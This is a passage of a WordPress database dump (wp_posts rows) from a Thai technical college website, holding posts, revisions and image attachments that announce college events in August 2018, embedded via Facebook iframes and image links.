'%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-24-%e0%b8%81%e0%b8%a3%e0%b8%81%e0%b8%8e%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%a7%e0%b8%b4', '', '', '2018-08-03 10:24:02', '2018-08-03 03:24:02', '', 0, 'http://www.technicrayong.ac.th/?p=3553', 357, 'post', '', 0),
(3554, 3, '2018-08-03 10:21:29', '2018-08-03 03:21:29', '', '37687818_635338383509020_5955663959171268608_o', '', 'inherit', 'closed', 'closed', '', '37687818_635338383509020_5955663959171268608_o', '', '', '2018-08-03 10:21:29', '2018-08-03 03:21:29', '', 3553, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/37687818_635338383509020_5955663959171268608_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3555, 3, '2018-08-03 10:24:02', '2018-08-03 03:24:02', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.635344246841767%26type%3D3&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 24 กรกฎาคม 2561 วิทยาลัยเทคนิคระยอง เข้ารับการตรวจประเมินศูนย์ซ่อมสร้างเพื่อชุมชน (Fix it Center) แบบถาวรประจำจังหวัด ประจำปีการศึกษา 2560 ให้เป็นไปตามระเบียบสำนักงานคณะกรรมการการอาชีวศึกษา และแนวปฏิบัติประกอบระเบียบฯ ว่าด้วยศูนย์ซ่อมสร้างเพื่อชุมชน พร้อมเยี่ยมชมศูนย์ ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3553-revision-v1', '', '', '2018-08-03 10:24:02', '2018-08-03 03:24:02', '', 3553, 'http://www.technicrayong.ac.th/3553-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3556, 3, '2018-08-03 10:24:14', '2018-08-03 03:24:14', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.635344246841767%26type%3D3&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 24 กรกฎาคม 2561 วิทยาลัยเทคนิคระยอง เข้ารับการตรวจประเมินศูนย์ซ่อมสร้างเพื่อชุมชน (Fix it Center) แบบถาวรประจำจังหวัด ประจำปีการศึกษา 2560 ให้เป็นไปตามระเบียบสำนักงานคณะกรรมการการอาชีวศึกษา และแนวปฏิบัติประกอบระเบียบฯ ว่าด้วยศูนย์ซ่อมสร้างเพื่อชุมชน พร้อมเยี่ยมชมศูนย์ ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3553-autosave-v1', '', '', '2018-08-03 10:24:14', '2018-08-03 03:24:14', '', 3553, 'http://www.technicrayong.ac.th/3553-autosave-v1/', 0, 'revision', '', 0),
(3557, 3, '2018-08-03 10:26:25', '2018-08-03 03:26:25', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D636223806753811%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักศึกษาสาขาวิชาการจัดการโลจิสติกส์ คว้ารางวัล \"ชนะเลิศ\" ในการเข้าร่วมการแข่งขัน SPU Logistic Packaging Competition 2018 โดยแบ่งการแข่งขันออกเป็น 2 สถานี ได้แก่ สถานีแข่งขันทำบรรจุภัณฑ์ภายใต้เงื่อนไขเพื่อป้องกันการแตก และสถานีแข่งขันการบรรจุสินค้าลงกล่อง ในวันจันทร์ที่ 23 กรกฎาคม 2561 ที่ผ่านมา ณ มหาวิทยาลัยศรีปทุม วิทยาเขตชลบุรี จังหวัดชลบุรี', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%aa%e0%b8%b2%e0%b8%82%e0%b8%b2%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94', '', '', '2018-08-03 10:26:25', '2018-08-03 03:26:25', '', 0, 'http://www.technicrayong.ac.th/?p=3557', 356, 'post', '', 0),
(3558, 3, '2018-08-03 10:25:58', '2018-08-03 03:25:58', '', '37726933_636217240087801_1917527443954991104_n', '', 'inherit', 'closed', 'closed', '', '37726933_636217240087801_1917527443954991104_n', '', '', '2018-08-03 10:25:58', '2018-08-03 03:25:58', '', 3557, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/37726933_636217240087801_1917527443954991104_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(3559, 3, '2018-08-03 10:26:25', '2018-08-03 03:26:25', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D636223806753811%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักศึกษาสาขาวิชาการจัดการโลจิสติกส์ คว้ารางวัล \"ชนะเลิศ\" ในการเข้าร่วมการแข่งขัน SPU Logistic Packaging Competition 2018 โดยแบ่งการแข่งขันออกเป็น 2 สถานี ได้แก่ สถานีแข่งขันทำบรรจุภัณฑ์ภายใต้เงื่อนไขเพื่อป้องกันการแตก และสถานีแข่งขันการบรรจุสินค้าลงกล่อง ในวันจันทร์ที่ 23 กรกฎาคม 2561 ที่ผ่านมา ณ มหาวิทยาลัยศรีปทุม วิทยาเขตชลบุรี จังหวัดชลบุรี', '', 'inherit', 'closed', 'closed', '', '3557-revision-v1', '', '', '2018-08-03 10:26:25', '2018-08-03 03:26:25', '', 3557, 'http://www.technicrayong.ac.th/3557-revision-v1/', 0, 'revision', '', 0),
(3560, 3, '2018-08-03 10:26:36', '2018-08-03 03:26:36', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D636223806753811%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักศึกษาสาขาวิชาการจัดการโลจิสติกส์ คว้ารางวัล \"ชนะเลิศ\" ในการเข้าร่วมการแข่งขัน SPU Logistic Packaging Competition 2018 โดยแบ่งการแข่งขันออกเป็น 2 สถานี ได้แก่ สถานีแข่งขันทำบรรจุภัณฑ์ภายใต้เงื่อนไขเพื่อป้องกันการแตก และสถานีแข่งขันการบรรจุสินค้าลงกล่อง ในวันจันทร์ที่ 23 กรกฎาคม 2561 ที่ผ่านมา ณ มหาวิทยาลัยศรีปทุม วิทยาเขตชลบุรี จังหวัดชลบุรี', '', 'inherit', 'closed', 'closed', '', '3557-autosave-v1', '', '', '2018-08-03 10:26:36', '2018-08-03 03:26:36', '', 3557, 'http://www.technicrayong.ac.th/3557-autosave-v1/', 0, 'revision', '', 0),
(3561, 3, '2018-08-03 10:32:15', '2018-08-03 03:32:15', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.637312329978292&type=3\"><img class=\"aligncenter wp-image-3562 size-full\" src=\"/wp-content/uploads/2018/08/3-8-2561-10-30-44.jpg\" alt=\"\" width=\"507\" height=\"657\" /></a>', 'พิธีถวายพระพร ตักบาตรข้าวสารอาหารแห้ง เนื่องในโอกาสวันเฉลิมพระชนมพรรษา ๖๖ พรรษา สมเด็จพระเจ้าอยู่หัวมหาวชิราลงกรณ บดินทรเทพยวรางกูร พิธีมอบเครื่องราชอิสริยาภรณ์และเหรียญจักพรรดิมาลา ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง และร่วมถวายเทียนพรรษา เนื่องในวันเข้าพรรษา ณ วัดป่าประดู่ วัดลุ่มมหาชัยชุมพล วัดตรีรัตนราม วัดปากน้ำ อำเภอเมือง จังหวัดระยอง วันพฤหัสบดีที่ ๒๖ กรกฎาคม ๒๕๖๑', '', 'publish', 'closed', 'open', '', '%e0%b8%9e%e0%b8%b4%e0%b8%98%e0%b8%b5%e0%b8%96%e0%b8%a7%e0%b8%b2%e0%b8%a2%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a3-%e0%b8%95%e0%b8%b1%e0%b8%81%e0%b8%9a%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%82%e0%b9%89', '', '', '2018-08-03 10:32:15', '2018-08-03 03:32:15', '', 0, 'http://www.technicrayong.ac.th/?p=3561', 355, 'post', '', 0),
(3562, 3, '2018-08-03 10:28:25', '2018-08-03 03:28:25', '', '3-8-2561 10-30-44', '', 'inherit', 'closed', 'closed', '', '3-8-2561-10-30-44', '', '', '2018-08-03 10:28:25', '2018-08-03 03:28:25', '', 3561, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/3-8-2561-10-30-44.jpg', 0, 'attachment', 'image/jpeg', 0),
(3563, 3, '2018-08-03 10:30:49', '2018-08-03 03:30:49', '', '37792871_637302969979228_6037474887067500544_o', '', 'inherit', 'closed', 'closed', '', '37792871_637302969979228_6037474887067500544_o', '', '', '2018-08-03 10:30:49', '2018-08-03 03:30:49', '', 3561, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/37792871_637302969979228_6037474887067500544_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3564, 3, '2018-08-03 10:32:15', '2018-08-03 03:32:15', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.637312329978292&type=3\"><img class=\"aligncenter wp-image-3562 size-full\" src=\"/wp-content/uploads/2018/08/3-8-2561-10-30-44.jpg\" alt=\"\" width=\"507\" height=\"657\" /></a>', 'พิธีถวายพระพร ตักบาตรข้าวสารอาหารแห้ง เนื่องในโอกาสวันเฉลิมพระชนมพรรษา ๖๖ พรรษา สมเด็จพระเจ้าอยู่หัวมหาวชิราลงกรณ บดินทรเทพยวรางกูร พิธีมอบเครื่องราชอิสริยาภรณ์และเหรียญจักพรรดิมาลา ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง และร่วมถวายเทียนพรรษา เนื่องในวันเข้าพรรษา ณ วัดป่าประดู่ วัดลุ่มมหาชัยชุมพล วัดตรีรัตนราม วัดปากน้ำ อำเภอเมือง จังหวัดระยอง วันพฤหัสบดีที่ ๒๖ กรกฎาคม ๒๕๖๑', '', 'inherit', 'closed', 'closed', '', '3561-revision-v1', '', '', '2018-08-03 10:32:15', '2018-08-03 03:32:15', '', 3561, 'http://www.technicrayong.ac.th/3561-revision-v1/', 0, 'revision', '', 0),
(3565, 3, '2018-08-03 10:32:26', '2018-08-03 03:32:26', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.637312329978292&type=3\"><img class=\"aligncenter wp-image-3562 size-full\" src=\"/wp-content/uploads/2018/08/3-8-2561-10-30-44.jpg\" alt=\"\" width=\"507\" height=\"657\" /></a>', 'พิธีถวายพระพร ตักบาตรข้าวสารอาหารแห้ง เนื่องในโอกาสวันเฉลิมพระชนมพรรษา ๖๖ พรรษา สมเด็จพระเจ้าอยู่หัวมหาวชิราลงกรณ บดินทรเทพยวรางกูร พิธีมอบเครื่องราชอิสริยาภรณ์และเหรียญจักพรรดิมาลา ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง และร่วมถวายเทียนพรรษา เนื่องในวันเข้าพรรษา ณ วัดป่าประดู่ วัดลุ่มมหาชัยชุมพล วัดตรีรัตนราม วัดปากน้ำ อำเภอเมือง จังหวัดระยอง วันพฤหัสบดีที่ ๒๖ กรกฎาคม ๒๕๖๑', '', 'inherit', 'closed', 'closed', '', '3561-autosave-v1', '', '', '2018-08-03 10:32:26', '2018-08-03 03:32:26', '', 3561, 'http://www.technicrayong.ac.th/3561-autosave-v1/', 0, 'revision', '', 0),
(3567, 3, '2018-08-06 20:09:42', '2018-08-06 13:09:42', '', '_20180806_200900', '', 'inherit', 'closed', 'closed', '', '_20180806_200900', '', '', '2018-08-06 20:09:42', '2018-08-06 13:09:42', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/20180806_200900.jpg', 0, 'attachment', 'image/jpeg', 0),
(3568, 3, '2018-08-07 08:23:45', '2018-08-07 01:23:45', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.645293075846884&type=3\"><img class=\"aligncenter wp-image-3569 size-full\" src=\"/wp-content/uploads/2018/08/7-8-2561-8-23-53.jpg\" alt=\"\" width=\"405\" height=\"632\" /></a>', 'วิทยาลัยเทคนิคระยอง ร่วมกับ กรมจัดหางานจังหวัดระยอง จัดโครงการเตรียมความพร้อมแก่กำลังแรงงาน แนะแนวอาชีพก่อนเข้าสู่ตลาดแรงงาน กิจกรรมสร้างเครือข่ายการแนะแนวอาชีพ วันศุกร์ที่ 3 สิงหาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b8%a3%e0%b9%88-3', '', '', '2018-08-07 08:24:31', '2018-08-07 01:24:31', '', 0, 'http://www.technicrayong.ac.th/?p=3568', 353, 'post', '', 0),
(3569, 3, '2018-08-07 08:21:41', '2018-08-07 01:21:41', '', '7-8-2561 8-23-53', '', 'inherit', 'closed', 'closed', '', '7-8-2561-8-23-53', '', '', '2018-08-07 08:21:41', '2018-08-07 01:21:41', '', 3568, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/7-8-2561-8-23-53.jpg', 0, 'attachment', 'image/jpeg', 0),
(3570, 3, '2018-08-07 08:23:30', '2018-08-07 01:23:30', '', '38457991_645273379182187_3229220970233331712_o', '', 'inherit', 'closed', 'closed', '', '38457991_645273379182187_3229220970233331712_o', '', '', '2018-08-07 08:23:30', '2018-08-07 01:23:30', '', 3568, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/38457991_645273379182187_3229220970233331712_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3571, 3, '2018-08-07 08:23:45', '2018-08-07 01:23:45', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.645293075846884&type=3\"><img class=\"aligncenter wp-image-3569 size-full\" src=\"/wp-content/uploads/2018/08/7-8-2561-8-23-53.jpg\" alt=\"\" width=\"405\" height=\"632\" /></a>', 'วิทยาลัยเทคนิคระยอง ร่วมกับ กรมจัดหางานจังหวัดระยอง จัดโครงการเตรียมความพร้อมแก่กำลังแรงงาน แนะแนวอาชีพก่อนเข้าสู่ตลาดแรงงาน กิจกรรมสร้างเครือข่ายการแนะแนวอาชีพ วันศุกร์ที่ 3 สิงหาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3568-revision-v1', '', '', '2018-08-07 08:23:45', '2018-08-07 01:23:45', '', 3568, 'http://www.technicrayong.ac.th/3568-revision-v1/', 0, 'revision', '', 0),
(3572, 3, '2018-08-07 08:24:40', '2018-08-07 01:24:40', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.645293075846884&type=3\"><img class=\"aligncenter wp-image-3569 size-full\" src=\"/wp-content/uploads/2018/08/7-8-2561-8-23-53.jpg\" alt=\"\" width=\"405\" height=\"632\" /></a>', 'วิทยาลัยเทคนิคระยอง ร่วมกับ กรมจัดหางานจังหวัดระยอง จัดโครงการเตรียมความพร้อมแก่กำลังแรงงาน แนะแนวอาชีพก่อนเข้าสู่ตลาดแรงงาน กิจกรรมสร้างเครือข่ายการแนะแนวอาชีพ วันศุกร์ที่ 3 สิงหาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3568-autosave-v1', '', '', '2018-08-07 08:24:40', '2018-08-07 01:24:40', '', 3568, 'http://www.technicrayong.ac.th/3568-autosave-v1/', 0, 'revision', '', 0),
(3573, 3, '2018-08-07 08:26:47', '2018-08-07 01:26:47', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D648357682207090%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมการประชุม เรื่องความร่วมมือในการจัดตั้งศูนย์การศึกษาภาษาจีน ในภาคตะวันออก ร่วมกับสถาบันการอาชีวศึกษาภาคตะวันออก วิทยาลัยทั้ง 9 แห่ง ในภาคตะวันออก และผู้บริหารระดับสูงจากสถาบันการศึกษา XINGTAI POLYTECHNIC COLLEGE ประเทศจีน ณ อาคารสถาบันฯ วิทยาลัยเทคนิคระยอง วันจันทร์ที่ 6 สิงหาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1-%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad', '', '', '2018-08-07 08:26:47', '2018-08-07 01:26:47', '', 0, 'http://www.technicrayong.ac.th/?p=3573', 352, 'post', '', 0),
(3574, 3, '2018-08-07 08:26:30', '2018-08-07 01:26:30', '', '38490607_648356858873839_3582132669099540480_n', '', 'inherit', 'closed', 'closed', '', '38490607_648356858873839_3582132669099540480_n', '', '', '2018-08-07 08:26:30', '2018-08-07 01:26:30', '', 3573, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/38490607_648356858873839_3582132669099540480_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(3575, 3, '2018-08-07 08:26:47', '2018-08-07 01:26:47', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D648357682207090%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมการประชุม เรื่องความร่วมมือในการจัดตั้งศูนย์การศึกษาภาษาจีน ในภาคตะวันออก ร่วมกับสถาบันการอาชีวศึกษาภาคตะวันออก วิทยาลัยทั้ง 9 แห่ง ในภาคตะวันออก และผู้บริหารระดับสูงจากสถาบันการศึกษา XINGTAI POLYTECHNIC COLLEGE ประเทศจีน ณ อาคารสถาบันฯ วิทยาลัยเทคนิคระยอง วันจันทร์ที่ 6 สิงหาคม 2561', '', 'inherit', 'closed', 'closed', '', '3573-revision-v1', '', '', '2018-08-07 08:26:47', '2018-08-07 01:26:47', '', 3573, 'http://www.technicrayong.ac.th/3573-revision-v1/', 0, 'revision', '', 0),
(3576, 3, '2018-08-07 08:26:58', '2018-08-07 01:26:58', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D648357682207090%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมการประชุม เรื่องความร่วมมือในการจัดตั้งศูนย์การศึกษาภาษาจีน ในภาคตะวันออก ร่วมกับสถาบันการอาชีวศึกษาภาคตะวันออก วิทยาลัยทั้ง 9 แห่ง ในภาคตะวันออก และผู้บริหารระดับสูงจากสถาบันการศึกษา XINGTAI POLYTECHNIC COLLEGE ประเทศจีน ณ อาคารสถาบันฯ วิทยาลัยเทคนิคระยอง วันจันทร์ที่ 6 สิงหาคม 2561', '', 'inherit', 'closed', 'closed', '', '3573-autosave-v1', '', '', '2018-08-07 08:26:58', '2018-08-07 01:26:58', '', 3573, 'http://www.technicrayong.ac.th/3573-autosave-v1/', 0, 'revision', '', 0),
(3577, 3, '2018-08-07 08:29:51', '2018-08-07 01:29:51', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D648370062205852%26id%3D100010985913485&width=500\" width=\"500\" height=\"888\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอบรมเชิงปฏิบัติการความรู้การเป็นผู้ประกอบการ และแข่งเขียนแผนธุรกิจ ประจำปีการศึกษา 2561 ขึ้น ในวันที่ 31 กรกฎาคม และ 1 สิงหาคม 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%87%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4-3', '', '', '2018-08-07 08:29:51', '2018-08-07 01:29:51', '', 0, 'http://www.technicrayong.ac.th/?p=3577', 351, 'post', '', 0),
(3578, 3, '2018-08-07 08:29:31', '2018-08-07 01:29:31', '', '38696070_2166176236980810_6421998545959649280_o', '', 'inherit', 'closed', 'closed', '', '38696070_2166176236980810_6421998545959649280_o', '', '', '2018-08-07 08:29:31', '2018-08-07 01:29:31', '', 3577, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/38696070_2166176236980810_6421998545959649280_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3579, 3, '2018-08-07 08:29:51', '2018-08-07 01:29:51', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D648370062205852%26id%3D100010985913485&width=500\" width=\"500\" height=\"888\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอบรมเชิงปฏิบัติการความรู้การเป็นผู้ประกอบการ และแข่งเขียนแผนธุรกิจ ประจำปีการศึกษา 2561 ขึ้น ในวันที่ 31 กรกฎาคม และ 1 สิงหาคม 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3577-revision-v1', '', '', '2018-08-07 08:29:51', '2018-08-07 01:29:51', '', 3577, 'http://www.technicrayong.ac.th/3577-revision-v1/', 0, 'revision', '', 0),
(3580, 3, '2018-08-07 08:30:02', '2018-08-07 01:30:02', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D648370062205852%26id%3D100010985913485&width=500\" width=\"500\" height=\"888\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอบรมเชิงปฏิบัติการความรู้การเป็นผู้ประกอบการ และแข่งเขียนแผนธุรกิจ ประจำปีการศึกษา 2561 ขึ้น ในวันที่ 31 กรกฎาคม และ 1 สิงหาคม 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3577-autosave-v1', '', '', '2018-08-07 08:30:02', '2018-08-07 01:30:02', '', 3577, 'http://www.technicrayong.ac.th/3577-autosave-v1/', 0, 'revision', '', 0),
(3581, 3, '2018-08-07 08:33:09', '2018-08-07 01:33:09', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.648473318862193&type=3\"><img class=\"aligncenter wp-image-3582 size-full\" src=\"/wp-content/uploads/2018/08/7-8-2561-8-34-11.jpg\" alt=\"\" width=\"456\" height=\"622\" /></a>', 'โครงการ RTC English Camp 2018 เพื่อยกระดับคุณภาพด้านภาษาอังกฤษของบุคลากรทางการศึกษา และนักเรียน นักศึกษา โดยการพัฒนาทักษะด้านภาษาอังกฤษ ให้สามารถใช้เป็นเครื่องมือในการติดต่อประสานงาน และเป็นทรัพยากรบุคลที่มีคุณภาพ ในประชาคมอาเซียนและประชาคมโลก ซึ่งจัดขึ้นระหว่างวันที่ 4-5 สิงหาคม 2561 ที่ผ่านมา ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-rtc-english-camp-2018-%e0%b9%80%e0%b8%9e%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a2%e0%b8%81%e0%b8%a3%e0%b8%b0%e0%b8%94%e0%b8%b1%e0%b8%9a', '', '', '2018-08-07 08:33:09', '2018-08-07 01:33:09', '', 0, 'http://www.technicrayong.ac.th/?p=3581', 350, 'post', '', 0),
(3582, 3, '2018-08-07 08:31:46', '2018-08-07 01:31:46', '', '7-8-2561 8-34-11', '', 'inherit', 'closed', 'closed', '', '7-8-2561-8-34-11', '', '', '2018-08-07 08:31:46', '2018-08-07 01:31:46', '', 3581, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/7-8-2561-8-34-11.jpg', 0, 'attachment', 'image/jpeg', 0),
(3583, 3, '2018-08-07 08:32:54', '2018-08-07 01:32:54', '', '38497318_648474705528721_2444001717600124928_n', '', 'inherit', 'closed', 'closed', '', '38497318_648474705528721_2444001717600124928_n', '', '', '2018-08-07 08:32:54', '2018-08-07 01:32:54', '', 3581, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/38497318_648474705528721_2444001717600124928_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(3584, 3, '2018-08-07 08:33:09', '2018-08-07 01:33:09', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.648473318862193&type=3\"><img class=\"aligncenter wp-image-3582 size-full\" src=\"/wp-content/uploads/2018/08/7-8-2561-8-34-11.jpg\" alt=\"\" width=\"456\" height=\"622\" /></a>', 'โครงการ RTC English Camp 2018 เพื่อยกระดับคุณภาพด้านภาษาอังกฤษของบุคลากรทางการศึกษา และนักเรียน นักศึกษา โดยการพัฒนาทักษะด้านภาษาอังกฤษ ให้สามารถใช้เป็นเครื่องมือในการติดต่อประสานงาน และเป็นทรัพยากรบุคลที่มีคุณภาพ ในประชาคมอาเซียนและประชาคมโลก ซึ่งจัดขึ้นระหว่างวันที่ 4-5 สิงหาคม 2561 ที่ผ่านมา ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3581-revision-v1', '', '', '2018-08-07 08:33:09', '2018-08-07 01:33:09', '', 3581, 'http://www.technicrayong.ac.th/3581-revision-v1/', 0, 'revision', '', 0),
(3585, 3, '2018-08-07 08:33:20', '2018-08-07 01:33:20', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.648473318862193&type=3\"><img class=\"aligncenter wp-image-3582 size-full\" src=\"/wp-content/uploads/2018/08/7-8-2561-8-34-11.jpg\" alt=\"\" width=\"456\" height=\"622\" /></a>', 'โครงการ RTC English Camp 2018 เพื่อยกระดับคุณภาพด้านภาษาอังกฤษของบุคลากรทางการศึกษา และนักเรียน นักศึกษา โดยการพัฒนาทักษะด้านภาษาอังกฤษ ให้สามารถใช้เป็นเครื่องมือในการติดต่อประสานงาน และเป็นทรัพยากรบุคลที่มีคุณภาพ ในประชาคมอาเซียนและประชาคมโลก ซึ่งจัดขึ้นระหว่างวันที่ 4-5 สิงหาคม 2561 ที่ผ่านมา ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3581-autosave-v1', '', '', '2018-08-07 08:33:20', '2018-08-07 01:33:20', '', 3581, 'http://www.technicrayong.ac.th/3581-autosave-v1/', 0, 'revision', '', 0),
